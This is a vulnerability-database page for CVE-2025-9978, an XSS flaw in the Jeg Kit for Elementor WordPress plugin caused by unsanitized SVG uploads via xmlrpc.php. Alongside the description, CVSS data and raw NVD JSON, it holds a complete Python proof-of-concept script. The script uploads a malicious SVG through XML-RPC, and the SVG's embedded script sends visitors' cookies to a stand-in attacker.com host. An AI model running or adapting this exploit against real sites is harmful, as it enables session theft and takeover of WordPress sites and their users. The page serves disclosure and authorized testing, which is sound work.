Security Vulnerability Report
中文
CVE-2025-9978 CVSS 6.8 MEDIUM

CVE-2025-9978

Published: 2025-10-24 06:15:36
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Jeg Kit for Elementor WordPress plugin before 2.7.0 does not sanitize SVG file contents when uploaded via xmlrpc.php, leading to a cross site scripting vulnerability.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Jeg Kit for Elementor < 2.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-9978 PoC - Jeg Kit for Elementor SVG XSS Note: Requires high privilege WordPress account """ import requests import base64 import sys # Malicious SVG with XSS payload MALICIOUS_SVG = '''<?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg"> <script type="text/javascript"> // Steal cookies and send to attacker server document.location="http://attacker.com/log?cookie="+document.cookie </script> <rect width="100" height="100" fill="red"/> </svg>''' def upload_svg_via_xmlrpc(target_url, username, password): """ Upload malicious SVG file via WordPress xmlrpc.php """ xmlrpc_endpoint = f"{target_url}/xmlrpc.php" # Base64 encode the SVG content b64_content = base64.b64encode(MALICIOUS_SVG.encode()).decode() # XML-RPC request to upload file xmlrpc_request = '''<?xml version="1.0"?> <methodCall> <methodName>wp.uploadFile</methodName> <params> <param><value><int>1</int></value></param> <param><value><string>{}</string></value></param> <param><value><string>{}</string></value></param> <param><value> <struct> <member> <name>name</name> <value><string>malicious.svg</string></value> </member> <member> <name>type</name> <value><string>image/svg+xml</string></value> </member> <member> <name>bits</name> <value><base64>{}</base64></value> </member> </struct> </value></param> </params> </methodCall>'''.format(username, password, b64_content) try: response = requests.post(xmlrpc_endpoint, data=xmlrpc_request, timeout=30) if response.status_code == 200: print("[+] SVG file uploaded successfully via xmlrpc.php") print("[+] XSS payload embedded in SVG will execute when file is accessed") return True else: print("[-] Upload failed") return False except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-9978.py <target_url> <username> <password>") sys.exit(1) upload_svg_via_xmlrpc(sys.argv[1], sys.argv[2], sys.argv[3])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9978", "sourceIdentifier": "[email protected]", "published": "2025-10-24T06:15:36.233", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Jeg Kit for Elementor WordPress plugin before 2.7.0 does not sanitize SVG file contents when uploaded via xmlrpc.php, leading to a cross site scripting vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://wpscan.com/vulnerability/cef78a77-c66d-4d62-8d49-140ca2d04d5b/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.